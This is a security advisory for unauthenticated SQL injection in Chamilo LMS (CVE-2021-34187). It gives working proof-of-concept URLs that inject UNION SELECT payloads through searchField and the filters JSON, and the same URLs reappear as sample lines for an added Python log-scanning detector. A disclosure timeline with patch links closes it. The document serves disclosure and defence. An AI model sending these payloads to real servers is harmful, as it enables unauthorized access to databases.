Product: Chamilo LMS 1.11.x, 2.x
Vulnerability: SQL injection
Author: Kutlymurat Mambetniyazov (@manfromkz)
Acknowledgements: NitroTeam.kz
Date: 05/25/2021
Description: The GET parameters searchField, filters and filters2 handled by /main/inc/ajax/model.ajax.php are used without sanitization, which leads to multiple unauthorized SQL injections.
Tested on: Windows 10 x64, Apache 2.4, 10.3.22-MariaDB, PHP 7.4, Chamilo LMS 1.11.x and 2.x.
PoC:
Version 1.11.x, parameter – searchField
http://chamilo1.11.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
Version 2.x, parameter – searchField
http://chamilo2.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
Parameters: filters, filters2
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters2={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
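The description and PoCs above all rest on one property: searchField and the "field" entries inside the filters/filters2 JSON are jqGrid column names, so a legitimate request never carries spaces, parentheses, quotes or comment markers in them. The following detection script is an added example for defenders and is not part of the advisory or of Chamilo's code. It applies that allowlist idea to web-server access-log lines: any request to model.ajax.php whose search parameters are not plain identifiers is reported. It assumes the combined log format of Apache/nginx, assumes the standard jqGrid operator set for searchOper/op, and uses constructed sample log lines built from the advisory's own PoC URLs plus one benign request. Whether the vendor's patch works this way is not stated on this page; the allowlist here is a defensive mirror of the weakness, not the vendor's fix.

```python
"""Flag jqGrid search parameters sent to model.ajax.php that cannot be column names.

Added detection example (not the advisory's or Chamilo's code).  Assumptions:
Apache/nginx combined log format, jqGrid's standard operator set, and that a
legitimate searchField / rules[].field value is a bare column identifier.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Characters a jqGrid column/field name may contain (assumption: letters,
# digits, underscore, dot).  Spaces, quotes, parentheses and "--" never appear
# in a genuine field name, so anything outside this set is reported.
IDENTIFIER = re.compile(r"[A-Za-z0-9_.]+")

# Search operators defined by jqGrid; searchOper and rules[].op should be one of these.
JQGRID_OPS = {"eq", "ne", "lt", "le", "gt", "ge", "bw", "bn", "in", "ni",
              "ew", "en", "cn", "nc", "nu", "nn"}

VULNERABLE_SCRIPT = "/main/inc/ajax/model.ajax.php"

# Combined log format: the request line is the first double-quoted field.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def _field_findings(label, value):
    if not IDENTIFIER.fullmatch(value):
        return [f"{label} is not a column identifier: {value!r}"]
    return []


def _op_findings(label, value):
    if value not in JQGRID_OPS:
        return [f"{label} is not a jqGrid operator: {value!r}"]
    return []


def inspect_request(target):
    """Return a list of findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if parts.path != VULNERABLE_SCRIPT:
        return []
    # parse_qs percent-decodes values, so %22/%20 in the PoCs become '"' and ' '.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in params.get("searchField", []):
        findings += _field_findings("searchField", value)
    for value in params.get("searchOper", []):
        findings += _op_findings("searchOper", value)
    # filters / filters2 carry jqGrid's JSON: {"groupOp": "...", "rules": [{"field","op","data"}]}
    for name in ("filters", "filters2"):
        for raw in params.get(name, []):
            try:
                doc = json.loads(raw)
            except ValueError:
                findings.append(f"{name} is not valid JSON: {raw[:40]!r}")
                continue
            rules = doc.get("rules", []) if isinstance(doc, dict) else []
            for rule in rules:
                if not isinstance(rule, dict):
                    continue
                findings += _field_findings(f"{name}.rules.field", str(rule.get("field", "")))
                findings += _op_findings(f"{name}.rules.op", str(rule.get("op", "")))
    return findings


def scan_access_log(lines):
    """Return [(line_number, findings)] for every log line that produced a finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        findings = inspect_request(match.group(1))
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log: one benign request, then the advisory's searchField
# and filters PoC URLs as they would appear in an access log.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/May/2021:10:00:01 +0000] "GET /main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=20&page=1&sidx=name&sord=asc&_search=1&searchField=name&searchOper=cn&searchString=alice&filters2={}&from_course_session=0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/May/2021:10:00:02 +0000] "GET /main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0 HTTP/1.1" 200 640',
    '10.0.0.9 - - [25/May/2021:10:00:03 +0000] "GET /main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG):
        for finding in findings:
            print(f"line {number}: {finding}")
```

Running the script reports lines 2 and 3 of the sample log and leaves the benign line 1 alone. The same identifier and operator checks, applied server-side before a field name reaches the query builder, are the shape of mitigation this class of bug calls for: validate field names against the grid's known columns rather than trying to escape them.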
Timeline of the vulnerability:
05/25/2021 – vulnerability discovered
05/27/2021 – notification to vendor
05/28/2021 – confirmation by vendor and patch release (version 1.11.x – https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571 and version 2.x – https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59)
06/01/2021 – published on the vendor's issue tracker (https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection)
06/20/2021 – published
06/28/2021 – CVE-2021-34187 was assigned by MITRE